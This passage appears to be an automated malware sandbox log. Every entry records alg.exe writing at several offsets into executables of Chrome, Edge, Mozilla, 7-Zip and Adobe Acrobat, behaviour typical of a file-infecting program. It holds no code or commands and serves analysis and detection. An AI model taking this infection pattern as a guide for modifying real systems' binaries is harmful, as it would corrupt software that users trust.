                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exe offset: 1792000
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exe offset: 2365516
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exe offset: 2365440
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exe offset: 777420
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe offset: 1776128
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe offset: 2349644
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe offset: 2349568
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe offset: 677164
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe offset: 228352
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe offset: 801868
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe offset: 801792
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe offset: 43297
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\7-Zip\7z.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\7-Zip\7z.exe offset: 557056
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\7-Zip\7z.exe offset: 1130572
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\7-Zip\7z.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\7-Zip\7z.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\7-Zip\7z.exe offset: 1130496
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\7-Zip\7z.exe offset: 382726
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\7-Zip\7z.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\7-Zip\7zFM.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\7-Zip\7zFM.exe offset: 952832
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\7-Zip\7zFM.exe offset: 1526348
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\7-Zip\7zFM.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\7-Zip\7zFM.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\7-Zip\7zFM.exe offset: 1526272
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\7-Zip\7zFM.exe offset: 614020
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\7-Zip\7zFM.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\7-Zip\7zG.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\7-Zip\7zG.exe offset: 700416
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\7-Zip\7zG.exe offset: 1273932
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\7-Zip\7zG.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\7-Zip\7zG.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\7-Zip\7zG.exe offset: 1273856
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\7-Zip\7zG.exe offset: 464916
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\7-Zip\7zG.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\7-Zip\Uninstall.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\7-Zip\Uninstall.exe offset: 14848
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\7-Zip\Uninstall.exe offset: 588364
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\7-Zip\Uninstall.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\7-Zip\Uninstall.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\7-Zip\Uninstall.exe offset: 588288
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\7-Zip\Uninstall.exe offset: 5610
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\7-Zip\Uninstall.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe offset: 5630464
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe offset: 6203980
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe offset: 6203904
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe offset: 3201596
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe offset: 27136
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe offset: 600652
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe offset: 600576
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe offset: 8988
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe offset: 31744
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe offset: 605260
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe offset: 605184
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe offset: 12684
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe offset: 332800
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe offset: 906316
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe offset: 906240
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe offset: 232412
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe offset: 3571200
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe offset: 4144716
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe offset: 4144640
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe offset: 1485948
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe offset: 59362816
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe offset: 59936332
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe offset: 59936256
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe offset: 140924
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe offset: 3571200
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe offset: 4144716
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe offset: 4144640
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe offset: 1485948
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe offset: 59362816
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe offset: 59936332
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe offset: 59936256
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe offset: 140924
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe offset: 50176
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe offset: 623692
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe offset: 623616
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe offset: 24668
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe offset: 328192
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe offset: 901708
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe offset: 901632
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe offset: 4988
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe offset: 642048
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe offset: 1215564
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe offset: 1215488
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe offset: 132252
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe offset: 11459072
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe offset: 12032588
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe offset: 12032512
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe offset: 4630732
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe offset: 192512
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe offset: 766028
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe offset: 765952
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe offset: 95345
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe offset: 759296
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe offset: 1332812
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe offset: 1332736
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe offset: 285633
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe offset: 385536
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe offset: 959052
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe offset: 958976
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe offset: 182364
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe offset: 123904
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe offset: 697420
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe offset: 697344
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe offset: 66716
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe offset: 1102848
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe offset: 1676364
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe offset: 1676288
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe offset: 753617
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe offset: 2531840
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe offset: 3105356
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe offset: 3105280
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe offset: 1150992
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe offset: 459776
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe offset: 1033292
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe offset: 1033216
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe offset: 209348
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe offset: 99840
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe offset: 673356
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe offset: 673280
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe offset: 69527
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe offset: 0
